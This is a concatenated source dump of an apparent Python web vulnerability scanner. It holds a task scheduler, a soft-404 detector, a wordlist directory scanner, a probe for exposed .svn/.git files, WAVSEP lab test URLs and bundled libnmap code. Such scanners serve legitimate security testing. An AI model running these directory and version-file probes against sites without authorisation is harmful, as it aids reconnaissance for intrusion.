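WAT_MSG_INFO={"taskid":"","website":"","profile":"","message":""}

if __name__=='__main__':
    # Messages fetched from the database that have not been dispatched yet.
    q = Queue(Settings.MAX_DISPATCH_TASK)
    while True:
        # Fetch phase: retry on database errors, but give up after
        # MAX_RETRY_COUNT consecutive failures. The counter is initialised
        # outside the retry loop; resetting it on every attempt would make
        # the limit unreachable.
        count = 0
        while True:
            rdb = None
            try:
                rdb = RDB()
                rdb.connect()
                tasks = rdb.getNewtasks(Settings.MAX_DISPATCH_TASK)
                for task in tasks:
                    msg = task.get("msg")
                    taskid = task.get("taskid")
                    taskstarttime = datetime.datetime.now()
                    # Mark the task as taken and record its start time
                    # before it is queued for dispatch.
                    rdb.updateFlag(taskid)
                    rdb.updateStart(taskid,taskstarttime)
                    q.put(msg)
                break
            except Exception as e:
                print(str(e))
                count += 1
                if count > Settings.MAX_RETRY_COUNT:
                    sys.exit(-1)
                time.sleep(Settings.RETRY_INTERVAL)
            finally:
                # Release the connection on every path, including failures.
                if rdb is not None:
                    try:
                        rdb.close()
                    except Exception as close_err:
                        log.error("taskSchedule: closing the task database failed: %s" % close_err)

        worker_count = q.qsize()
        wait_circle = worker_count/Settings.MAX_CONCURRENT_NUM

        # Dispatch phase: hand out at most MAX_CONCURRENT_NUM messages per round.
        while True:
            if q.empty():
                break

            msg_list = []
            for i in xrange(Settings.MAX_CONCURRENT_NUM):
                if not q.empty():
                    msg_list.append(q.get())

            for item in msg_list:
                try:
                    DoScanTask.delay(item)
                except Exception as e:
                    # The task is already flagged as started in the database,
                    # so a failed dispatch must at least leave a trace.
                    log.error("taskSchedule: dispatching a scan task failed: %s" % e)

            time.sleep(wait_circle*Settings.SCAN_TASK_INTERVAL)
        time.sleep(Settings.DISPATCH_TASK_INTERVAL)

--------------------------------------------------------------------------------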
/thirdparty/libnmap/test/files/1_hosts_banner_ports_xmas.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /teye_web/wavsep/false_sql_url.txt: -------------------------------------------------------------------------------- 1 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 2 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 3 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case03-FalsePositiveInjectionInLogin-PsAndIv-200ErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 4 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case04-FalsePositiveInjectionInLogin-PsAndIv-200SyntaxErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 5 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case05-FalsePositiveInjectionInLogin-PsAndIv-Different200ValidOnIvFailure.jsp?username=textvalue&password=textvalue2 6 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 7 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=textvalue&password=textvalue2 8 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case08-FalsePositiveInjectionInLogin-PsAndIv-200ErrorOnUnrelatedSyntaxError.jsp?username=textvalue&password=textvalue2 9 | 
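http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case09-FalsePositiveInjectionInUpdate-PsAndIv-Different200ValidOnIvFailure.jsp?transactionDate=2010-02-02
10 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case10-FalsePositiveInjectionInUpdate-PsAndIv-Identical200Response.jsp?transactionDate=2010-02-02
11 |
12 |
--------------------------------------------------------------------------------
/teye_util/page_404.py:
--------------------------------------------------------------------------------
#coding=utf-8

import sys
# NOTE(review): developer-specific absolute path. Modules are resolved from
# this directory whenever it exists, so on a shared host it should be replaced
# by a path derived from the project root.
sys.path.append("/Users/imiyoo/workplace/tscanner")

from wCurl import wcurl

from teye_web.http.URL import URL
from teye_web.http.function import is_similar_page
from misc.common import rand_letters


class page_404:
    '''
    Detects "not found" pages, including sites that answer a missing path
    with a 200/301/302 response instead of a 404 status.

    For each domain it keeps the response to a random, presumably
    non-existent path and compares later responses with it.
    '''
    _instance = None

    def __init__(self):
        # domains for which a reference not-found response was recorded
        self._404_already_domain = []

        # list of (domain, reference not-found response) tuples
        self._404_kb = []

        # status codes for which the similarity comparison is performed
        self._404_code_list=[200,301,302]

        self._404_checked = False


    def generate_404_kb(self,url):
        '''
        Fetch the domain root and a random ".html" path below it and record
        the second response as the domain's reference not-found page.

        Nothing is recorded when the two responses are similar, because the
        reference page could then not be told apart from a normal page.

        :param url: URL object of the response being classified
        '''
        domain = url.get_domain()
        domain_path = url.get_domain_path()
        # presumably 8 random letters; see misc.common.rand_letters
        rand_file = rand_letters(8) + '.html'
        url_404 = domain_path.urljoin(rand_file)
        resp_200 = wcurl.get(domain_path)
        resp_404 = wcurl.get(url_404)

        if not is_similar_page(resp_200,resp_404):
            self._404_already_domain.append(domain)
            self._404_kb.append((domain,resp_404))


    def set_check(self):
        '''
        Reset the recorded not-found knowledge.

        The list of already handled domains is cleared together with the
        reference responses; otherwise is_404 would never rebuild the
        reference for a domain it has seen before and the similarity check
        would silently stop working.
        '''
        self._404_kb = []
        self._404_already_domain = []
        self._404_checked = False

    def is_404(self,http_response):
        '''
        Return True when the response is a not-found page.

        :param http_response: response object providing get_code() and get_url()
        :return: True for status 404, or for a status in the compared list
                 whose page is similar to the domain's reference page
        '''
        code = http_response.get_code()

        url = http_response.get_url()

        domain = url.get_domain()

        if domain not in self._404_already_domain:
            self.generate_404_kb(url)

        if code == 404:
            return True

        if code in self._404_code_list:
            for domain_404,resp_404 in self._404_kb:
                if domain == domain_404 and is_similar_page(http_response,resp_404):
                    return True

        return False

def is_404(http_response):
    '''Classify a response with the shared, lazily created page_404 instance.'''
    if page_404._instance is None:
        page_404._instance = page_404()
    return page_404._instance.is_404(http_response)


if __name__=="__main__":
    url="http://www.baidu.com/44444.html"
    res = wcurl.get(url)


    if is_404(res):
        print("404")
        #print res.body

--------------------------------------------------------------------------------
/teye_web/http/function.py:
--------------------------------------------------------------------------------
#coding=utf-8

from teye_web.http.URL import URL
from hashes.simhash import simhash

def is_contain_list(a_list,b_list):
    '''
    Return True when both arguments are lists of equal length and every
    element of b_list also occurs in a_list; False otherwise.

    Example of two lists that compare as equal:
    >>>a_list=['a','b','c']
    >>>b_list=['c','a','b']
    '''
    if not isinstance(a_list,list) or not isinstance(b_list,list):
        return False

    if len(a_list) != len(b_list):
        return False

    # Order is ignored; membership is tested element by element.
    return all(item in a_list for item in b_list)

def is_similar_url(url1,url2):
    '''
    Return True when two URLs have the same URI string and the same set of
    query-string parameter names (parameter values are not compared).

    :param url1: URL object, or a value accepted by the URL constructor
    :param url2: URL object, or a value accepted by the URL constructor
    :return: bool
    '''
    if not isinstance(url1,URL):
        url1 = URL(url1)

    if not isinstance(url2,URL):
        url2 = URL(url2)

    url1_str = url1.get_uri_string()
    url2_str = url2.get_uri_string()

    # list() keeps the comparison working when keys() returns a view
    qs1 = list(url1.get_querystring().keys())
    qs2 = list(url2.get_querystring().keys())

    return url1_str==url2_str and is_contain_list(qs1,qs2)
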
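def is_similar_page(res1,res2,radio=0.85):
    '''
    Return True when the bodies of two responses are similar.

    The bodies are split on whitespace, hashed with simhash and compared;
    the pages count as similar when the similarity is greater than radio.

    :param res1: response object with a body attribute, or None
    :param res2: response object with a body attribute, or None
    :param radio: similarity threshold
    :return: bool, False when either response is None
    '''
    if res1 is None or res2 is None:
        return False

    simhash1 = simhash(res1.body.split())
    simhash2 = simhash(res2.body.split())

    calc_radio = simhash1.similarity(simhash2)
    return calc_radio > radio

--------------------------------------------------------------------------------
/scan_traffic.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
scan_traffic.py

Rebuilds HTTP requests from a captured traffic log and passes each one to
the scan engine.
'''
import os
import re
import sys
from teye_web.http.URL import URL
from teye_web.http.Request import Request
from teye_web.http.cookie import cookie
from teye_web.http.postdata import postdata


from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO

class HTTPRequest(BaseHTTPRequestHandler):
    '''Parses the text of one HTTP request without any socket.'''
    def __init__(self, request_text):
        self.rfile = StringIO(request_text)
        self.raw_requestline = self.rfile.readline()
        self.error_code = self.error_message = None
        self.parse_request()

    def send_error(self, code, message=None):
        # parse_request() reports malformed input through send_error(); the
        # inherited version writes to a socket this object does not have, so
        # the error is only recorded here.
        self.error_code = code
        self.error_message = message

def read_request(str):
    '''
    Build a Request object from one captured request/response exchange.

    Captured traffic is untrusted input, so anything that does not parse as
    a request with a Host header is skipped instead of raising.

    :param str: text of the exchange, request first
    :return: Request object, or None when the text holds no usable request
    '''
    rlist = str.split("\n\nHTTP/1.1")
    req_str = rlist[0].strip()

    # text that starts with a status line is a response, not a request
    if req_str.startswith("HTTP/1.1"):
        return None

    basereq = HTTPRequest(req_str)
    headers = getattr(basereq, "headers", None)
    if basereq.error_code is not None or headers is None:
        return None

    netloc = headers.get('host')
    if netloc is None:
        return None
    del headers['host']

    url = URL(netloc + basereq.path)
    return Request(url,basereq.command,headers=headers)

def convert_traffic_to_req(http_file):
    '''
    Split a traffic log on its connection markers and return the distinct
    requests found in it.

    :param http_file: path of the log file
    :return: list of Request objects
    '''
    req_list = []
    with open(http_file,"rb") as log_file:
        content = log_file.read()
    # marker format: [172.24.72.136:62822] -- -- --> [10.46.7.223:80]
    pattern = r"\[\d+\.\d+\.\d+\.\d+:\d+\]\s--\s--\s-->\s\[\d+\.\d+\.\d+\.\d+:\d+\]"
    match = re.split(pattern,content)

    # the text before the first marker is not an exchange
    for data in match[1:]:
        req = read_request(data)
        if req is not None and req not in req_list:
            req_list.append(req)
    return req_list

pcap_file = "test.pcap"
http_file ="http_"+pcap_file.split(".")[0] + ".log"
# use httpcap to parse and filter the PCAP file
# NOTE(review): the command line goes through the shell. That is fine only
# while both file names are the constants above; if they ever become
# configurable, run the tool with an argument list and redirect its output
# from Python instead.
cmd = "parse_pcap -vv %s > %s" % (pcap_file,http_file)
os.system(cmd)
req_list = convert_traffic_to_req(http_file)
from teye_core.tcore import tCore
for item in req_list:
    print(item)
    scan_engine = tCore()
    scan_engine.scan_request(item)


--------------------------------------------------------------------------------
/teye_web/wavsep/false_lfi_url.txt:
--------------------------------------------------------------------------------
1 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/active/LFI/LFI-FalsePositives-GET/validfile1.jsp
2 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case02-LFI-FalsePositive-OpenRedirect-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp
3 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case03-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-WhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=validfile1.jsp
4 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case04-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-TraversalRemovalAndWhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=validfile1.jsp
5 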
http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case05-LFI-FalsePositive-ContextStream-TextHtmlValidResponse-FilenameContext-WhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/active/LFI/LFI-FalsePositives-GET/validfile1.jsp 6 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case06-LFI-FalsePositive-ContextStream-TextHtmlValidResponse-FilenameContext-TraversalRemovalAndWhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/active/LFI/LFI-FalsePositives-GET/validfile1.jsp 7 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.0\webapps\wavsep\active\LFI\LFI-FalsePositives-GET\content.ini 8 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case08-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-InputNotUsed-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.0\webapps\wavsep\active\LFI\LFI-FalsePositives-GET\content.ini 9 | 10 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_banner_ports.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |
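14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 |
--------------------------------------------------------------------------------
/teye_report/HtmlReport.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
HtmlReport.py
'''
import sys
import teye_config as Settings

import json
import time

class HtmlReport:
    '''
    Writes an HTML report by filling scan data into a report template.
    '''
    def __init__(self,db_info=None,model="SITE"):
        '''
        :param db_info: report data; generate() parses str(db_info) as JSON
        :param model: "SITE" or "MAPP", selects the template file
        '''
        if model=="SITE":
            self._report_template = Settings.ROOT_PATH + "/teye_report/template/WAT_SITE_Report_For_Test_V1.html"
        elif model=="MAPP":
            self._report_template = Settings.ROOT_PATH + "/teye_report/template/WAT_MAPP_Report_For_Test_V1.html"
        else:
            # no template exists for other models; generate() reports this
            self._report_template = None


        print(Settings.ROOT_PATH)
        self._report_dir = Settings.ROOT_PATH + "/teye_report/template/"

        self._db_info = db_info

        self._apiinfos = []
        self._vulntypes = []
        self._vulninfos = []
        self._infos = {}

        self._vulnids = []

    def set_report_info(self,target,date_string=""):
        '''
        Store the report target and date.

        :param target: scanned target shown in the report
        :param date_string: report date; the current local time is used when empty
        '''
        if date_string=="":
            self._infos["date"]=time.strftime('%a %b %d %X %Y',time.localtime(time.time()))
        else:
            # a caller-supplied date was previously dropped
            self._infos["date"] = date_string
        self._infos["target"] = target

    def generate(self,filename):
        '''
        Write the report file.

        str(db_info) is parsed as JSON, serialised again and substituted for
        the "#___JSON_DATA___#" placeholder of the template. The result is
        written to the report directory as "YYYY-MM-DD_" + filename.

        Example of the data the template works on:
        report_data = {"entry":"www.watscan.com",
                       "scan_target":["10.10.10.10","app.watscan.com","test.watscan.com"],
                       "ipaddr":"10.10.10.10",
                       "port":[],
                       "domain":"baidu.com",
                       "relate_ipaddr":[],
                       "finger":"",
                       "nameserver":[],
                       "subdomain":[],
                       "dir":[],
                       "vuln":[{
                           "site":"www.watscan.com",
                           "vlist":
                           [
                               {
                                   "name":"SQL injection vulnerability",
                                   "list":
                                   [
                                       {"url":"http://www.watscan.com/index.php?id=1","risk":"high","method":"GET"}
                                   ]
                               }
                           ]
                       }]
                      };

        :param filename: file name appended to the date prefix
        :raises ValueError: when no template matches the report model, or
                            when db_info is not valid JSON
        '''
        if self._report_template is None:
            raise ValueError("unknown report model, no template selected")

        report_dict = json.loads(str(self._db_info))

        json_data = json.dumps(report_dict)
        # The report data contains strings taken from scanned sites (URLs,
        # names), so it is untrusted. Written as \uXXXX escapes, the three
        # characters below still decode to the same JSON but cannot close or
        # open markup in the page that embeds it.
        # NOTE(review): assumes the placeholder sits inside a script element
        # of the template, as the example above suggests - confirm.
        json_data = json_data.replace("&","\\u0026").replace("<","\\u003c").replace(">","\\u003e")

        with open(self._report_template,"r") as fd:
            html_data = fd.read()
        html_data = html_data.replace("#___JSON_DATA___#",json_data)

        # NOTE(review): filename is appended to the path unchanged; if it can
        # come from task data it should be reduced to a base name first -
        # confirm with the callers.
        filepath = self._report_dir+time.strftime('%Y-%m-%d',time.localtime(time.time()))+"_"+filename
        with open(filepath,"w") as fd_new:
            fd_new.write(html_data)

--------------------------------------------------------------------------------
/teye_worker/scan.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
scan.py

Celery worker task that runs one scan as a child process.
'''
import sys
sys.path.append("..")
import teye_config as Settings

from celery import Celery
from celery import platforms

import os
import uuid
import platform
import hashlib
import shlex
import subprocess
import time
import datetime
import json

from LogManager import log
from RDB import RDB

# run as root
#platforms.C_FORCE_ROOT = True
# number of tasks a worker executes before it is replaced
#CELERYD_MAX_TASKS_PER_CHILD = 40

BROKER_URL='redis://127.0.0.1:6379/0'
app = Celery('scan',broker=BROKER_URL)
#app.config_from_object('scan.config')

'''
class CountTask(celery.Task):
    count = 0

    def on_success(self, retval, task_id, args, kwargs):
        self.count += 1
        return self.count
'''

try:
    _TEXT_TYPES = (basestring,)
except NameError:
    _TEXT_TYPES = (str,)


def _is_plain_argument(value):
    '''Return True for a non-empty string that cannot be read as an option.'''
    return isinstance(value,_TEXT_TYPES) and value != "" and not value.startswith("-")


def _finish_task(taskid,progress=None):
    '''Record the finish time of a task, optionally setting its progress first.'''
    rdb = RDB()
    rdb.connect()
    taskendtime = datetime.datetime.now()
    if progress is not None:
        rdb.updateProgress(taskid,progress)
    rdb.updateFinish(taskid,taskendtime)
    rdb.close()
    return taskendtime


@app.task(ignore_result=True)
def DoScanTask(msg_info):
    '''
    Run the scanner for one queued task and record the result.

    :param msg_info: JSON text with the keys "website", "taskid" and "profile"
    :return: True when the scanner exits with status 0, otherwise False
    '''
    log.info("TScanner Get the Msg From the Task Queue")
    msg_json = json.loads(msg_info)
    website= msg_json.get("website")
    taskid= int(msg_json.get("taskid"))
    profile = msg_json.get("profile")
    taskstarttime = datetime.datetime.now()

    # website and profile come from the task message and are untrusted.
    # They are passed as separate arguments and never through a shell, so
    # quotes or shell metacharacters in them stay inert. Values that look
    # like options are rejected so they cannot change the scanner's flags.
    if not (_is_plain_argument(website) and _is_plain_argument(profile)):
        log.error("Error DoScanTask: rejected website/profile of task %d" % taskid)
        _finish_task(taskid,100)
        return False

    # NOTE(review): assumes PYTHON_ENV is an interpreter path with optional
    # arguments, not a shell snippet - confirm against teye_config.
    argv = shlex.split(str(Settings.PYTHON_ENV),posix=(os.name != "nt"))
    argv += [str(Settings.TEYE_PY_PATH),"-t",str(taskid),"-s",website,"-p",profile,"-m","teye"]
    if platform.system().lower()=="linux":
        # limit the run time of a single scan
        argv = ["timeout",str(Settings.MAX_SCAN_TIME)] + argv

    print(repr(argv))
    log.info(repr(argv))
    try:
        ret = subprocess.call(argv)
    except OSError as e:
        # the interpreter or the timeout binary could not be started
        log.error("Error DoScanTask: cannot start scanner: %s" % e)
        ret = -1

    # ret == 0 means success
    if ret!=0:
        log.error("Error DoScanTask:%s" % repr(argv))
        _finish_task(taskid,100)
        return False

    taskendtime = _finish_task(taskid)
    log.info("Scan Website:"+website + " Spend Time:"+str(taskendtime-taskstarttime))
    return True

--------------------------------------------------------------------------------
/thirdparty/libnmap/test/process-stressbox/check_fqp_nmap.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser, NmapParserException


# start a new nmap scan on localhost with some specific options
def do_scan(targets, options, fqp=None):
    """
    Run nmap through NmapProcess and parse its output.

    :param targets: scan targets passed to NmapProcess
    :param options: nmap option string
    :param fqp: full path of the nmap binary, passed on to NmapProcess
    :return: parsed report, or None when the output cannot be parsed
    """
    parsed = None
    nm = NmapProcess(targets, options, fqp=fqp)
    rc = nm.run()
    if rc != 0:
        print("nmap scan failed: {0}".format(nm.stderr))

    try:
        parsed = NmapParser.parse(nm.stdout)
    except NmapParserException as e:
        print("Exception raised while parsing scan: {0}".format(e.msg))

    return parsed


# print scan results from a nmap report
def print_scan(nmap_report):
    print("Starting Nmap {0} ( http://nmap.org ) at {1}".format(
        nmap_report.version,
        nmap_report.started))

    for host in nmap_report.hosts:
        if len(host.hostnames):
            tmp_host = host.hostnames.pop()
        else:
            tmp_host = host.address

        print("Nmap scan report for {0} ({1})".format(
            tmp_host,
            host.address))
        print("Host is 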
{0}.".format(host.status)) 38 | print(" PORT STATE SERVICE") 39 | 40 | for serv in host.services: 41 | pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format( 42 | str(serv.port), 43 | serv.protocol, 44 | serv.state, 45 | serv.service) 46 | if len(serv.banner): 47 | pserv += " ({0})".format(serv.banner) 48 | print(pserv) 49 | print(nmap_report.summary) 50 | 51 | 52 | if __name__ == "__main__": 53 | report = do_scan("127.0.0.1", "-sT") 54 | print_scan(report) 55 | # test with full path to bin 56 | # /usr/bin/nmap 57 | report = do_scan("127.0.0.1", "-sT", fqp="/usr/bin/nmap") 58 | print_scan(report) 59 | # /usr/bin/lol --> will throw exception 60 | try: 61 | report = do_scan("127.0.0.1", "-sV", fqp="/usr/bin/lol") 62 | print("lolbin") 63 | print_scan(report) 64 | except Exception as exc: 65 | print(exc) 66 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_banner_ports_notsyn.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
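--------------------------------------------------------------------------------
/teye_dir/DirScan.py:
--------------------------------------------------------------------------------
# coding=utf-8
'''
DirScan.py
'''
import os
import sys

# Load the configuration file
sys.path.append("..")
import teye_config as Settings

import re
import time
from misc.common import is_404
from wCurl import wcurl
from LogManager import log


class DirScan:
    '''
    Request every entry of a wordlist against one site and remember the URLs
    that look like real content.

    A URL is kept when the final response code is 200 and is_404() does not
    classify the body as a soft error page.
    '''

    def __init__(self):
        '''
        Start with an empty result list and no wordlist selected.
        '''
        self._found_dir = []

        self._dir_file = None

    def scan_dir(self, site, dir_file=None):
        '''
        Probe `site` with each path listed in the wordlist.

        :param site: base URL; one trailing "/" is dropped before a path is
            appended
        :param dir_file: wordlist path, Settings.DIR_WEB_FILE when omitted.
            Entries are appended to the base unchanged, so they are
            presumably written with a leading "/" (verify against the list).
        '''
        self._dir_file = dir_file if dir_file else Settings.DIR_WEB_FILE

        # Read the wordlist and release the file handle straight away.
        with open(self._dir_file, "rb") as handle:
            file_list = handle.readlines()

        base = site[0:-1] if site.endswith("/") else site

        for item in file_list:
            path = item.strip()

            # A blank entry would only re-request the base URL and record it
            # as a finding, so it is skipped together with "#" comments.
            if not path or path.startswith("#"):
                continue

            url = base + path

            try:
                res = wcurl.get(url, allow_redirects=False)

                status = res.get_code()

                # No status code at all: give up on the whole scan.
                if status is None:
                    break

                log.info("Check URL:" + url + " code:" + str(status))

                final_res = None
                if status == 200:
                    final_res = res
                elif status == 301 or status == 302:
                    next_res = wcurl.get(url, allow_redirects=True)
                    if next_res.get_code() == 200:
                        # Judge the page the redirect ends on; the redirect
                        # response itself carries no page content to classify.
                        final_res = next_res

                if final_res is not None and not is_404(final_res.body):
                    msg = "Found URL:" + url + " code:" + str(status) + " 404 Check: False"
                    print msg
                    self._found_dir.append(url)

            except Exception as e:
                print "Http Request Error %s" % str(e)

            # Fixed pause between requests.
            time.sleep(0.1)

    def get_dir_file(self):
        '''
        Return the list of URLs recorded by scan_dir().
        '''
        return self._found_dir


if __name__ == "__main__":
    # Manual run: the first command-line argument is the site to check.
    url = sys.argv[1]

    print url

    dir_scan = DirScan()

    try:
        dir_scan.scan_dir(url)
    except Exception as e:
        print str(e)
    print "发现的目录和文件:"
    print dir_scan.get_dir_file()
--------------------------------------------------------------------------------
/thirdparty/libnmap/plugins/es.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

import json
from libnmap.reportjson import ReportEncoder
from libnmap.plugins.backendplugin import NmapBackendPlugin
from elasticsearch import Elasticsearch
from datetime import datetime


class NmapElasticsearchPlugin(NmapBackendPlugin):
    """
        This class enables the user to store and manipulate nmap reports \
        in a elastic search db.
    """
    def __init__(self, index=None):
        """
            :param index: index name; defaults to "nmap.<YYYY-MM-DD>" built
            from the local date at construction time
        """
        if index is None:
            self.index = "nmap.{0}".format(datetime.now().strftime('%Y-%m-%d'))
        else:
            self.index = index
        # Client built with its defaults: no hosts, credentials or TLS
        # options are passed here.
        self._esapi = Elasticsearch()

    def insert(self, report, doc_type=None):
        """
            insert NmapReport in the backend
            :param report: NmapReport, serialised with ReportEncoder
            :param doc_type: document type, 'NmapReport' when omitted
            :return: str the ident of the object in the backend for
            future usage
        """
        if doc_type is None:
            doc_type = 'NmapReport'
        # Round-trip through JSON so the indexed body holds plain types only.
        j = json.dumps(report, cls=ReportEncoder)
        res = self._esapi.index(
            index=self.index,
            doc_type=doc_type,
            body=json.loads(j))
        rc = res['_id']
        return rc

    def delete(self, id):
        """
            delete NmapReport in the backend (not implemented)
            :param id: str
        """
        raise NotImplementedError

    def get(self, id):
        """
            retrieve a NmapReport from the backend
            :param id: str
            :return: the '_source' of the stored document
        """
        res = self._esapi.get(index=self.index,
                              doc_type="NmapReport",
                              id=id)['_source']
        return res

    def getall(self, filter=None):
        """
            :param filter: Nice to have implement a filter capability
            (currently ignored)

            NOTE(review): the search result is only printed; nothing is
            returned although a collection of (id, NmapReport) is announced.
        """
        rsearch = self._esapi.search(index=self.index,
                                     body={"query": {"match_all": {}}})
        print("--------------------")
        print(type(rsearch))
        print(rsearch)
        print("------------")
--------------------------------------------------------------------------------
/teye_web/ver.py:
--------------------------------------------------------------------------------
# coding=utf-8
'''
ver.py
'''
import re
import os
import sys
import copy
import teye_data.severity as severity
from teye_data.vuln import vuln
from teye_data.vulnmanager import vm

from LogManager import log

# wCurl
from wCurl import wcurl
from http.URL import URL
from http.Request import Request

import requests

from util.gen_zip_name import gen_zip_name

from misc.common import is_404


class ver:
    '''
    Plugin that reports version-control metadata files (.svn/.git) which the
    web server hands out as downloads.
    '''

    def __init__(self):
        '''
        Set up the file list, the expected content type and the run-once flag.
        '''
        # Set after the first run; check() returns immediately once it is True.
        self._already_flag = False

        self._already_check_domain = []

        self._ver_file = [".svn/wc.db", ".svn/entries", ".git/index"]

        self._ver_content_type = "application/octet-stream"

        # Seconds to wait for each probe so one unresponsive host cannot
        # stall the scan.
        self._timeout = 10

    def check(self, t_request):
        '''
        Send a HEAD request for each metadata file next to the request URL
        and register a high-severity finding for every 200 response whose
        Content-Type equals application/octet-stream.

        Only the first call does any work: the flag set below turns every
        later call into a no-op, whatever the domain.

        :param t_request: request object; it is deep-copied, not modified
        '''
        http_request = copy.deepcopy(t_request)
        url_obj = http_request.get_url()
        domain = url_obj.get_domain()

        if self._already_flag:
            return

        if domain in self._already_check_domain:
            return

        self._already_check_domain.append(domain)
        self._already_flag = True

        log.info(u"正在检测目标是否存在版本文件漏洞...")
        uri_string = url_obj.get_uri_string()

        for item in self._ver_file:
            ver_url = URL(uri_string).urljoin(item)

            try:
                res = requests.head(ver_url, timeout=self._timeout)
            except requests.RequestException as e:
                # One failed probe must not abort the remaining ones.
                log.info("Ver check request failed: %s" % str(e))
                continue

            # An error page can carry any content type; only a successful
            # response says the file is really served.
            if res.status_code != 200:
                continue

            # The header may be missing entirely; treat that as "no match".
            ver_ct = res.headers.get("content-type", "").lower()

            # ("wc.db|entries|index","application/octet-stream")
            if ver_ct == self._ver_content_type:
                v = vuln()
                v.set_url(ver_url)
                v.set_method("GET")
                v.set_param("")
                v.set_name("Ver Vuln")
                v.set_rank(severity.H)
                vm.append(self, http_request.get_url().get_host(), "ver", v)
                log.info("Ver Vuln")
                print "Ver Vuln 漏洞URL:%s" % (ver_url)

    def get_name(self):
        '''
        Return the plugin identifier.
        '''
        return "teye_ver_plugin"


if __name__ == "__main__":
    # Manual run against a lab address.
    ver_url = "http://192.168.126.142/book/ver/"
    req = Request(ver_url)
    t_scanner = ver()
    t_scanner.check(req)
    print vm.get_all_vuln()
--------------------------------------------------------------------------------
/thirdparty/libnmap/objects/cpe.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-


class CPE(object):
    """
        CPE class offers an API for basic CPE objects.
        These objects could be found in NmapService or in tag
        within NmapHost.

        :todo: interpret CPE string and provide appropriate API
    """
    def __init__(self, cpestring):
        """
            Split the CPE string on ':' and map the pieces, in order, onto
            the fields cpe, part, vendor, product, version, update, edition
            and language; fields the string does not reach stay ''.
        """
        self._cpestring = cpestring
        # Public attribute kept as before; the parsed fields live in _cpedict.
        self.cpedict = {}

        zk = ['cpe', 'part', 'vendor', 'product', 'version',
              'update', 'edition', 'language']
        self._cpedict = dict.fromkeys(zk, '')
        for field, value in zip(zk, cpestring.split(':')):
            self._cpedict[field] = value

    @property
    def cpestring(self):
        """
            Accessor for the full CPE string.
        """
        return self._cpestring

    def __repr__(self):
        return self._cpestring

    def get_part(self):
        """
            Returns the cpe part (/o, /h, /a)
        """
        return self._cpedict['part']

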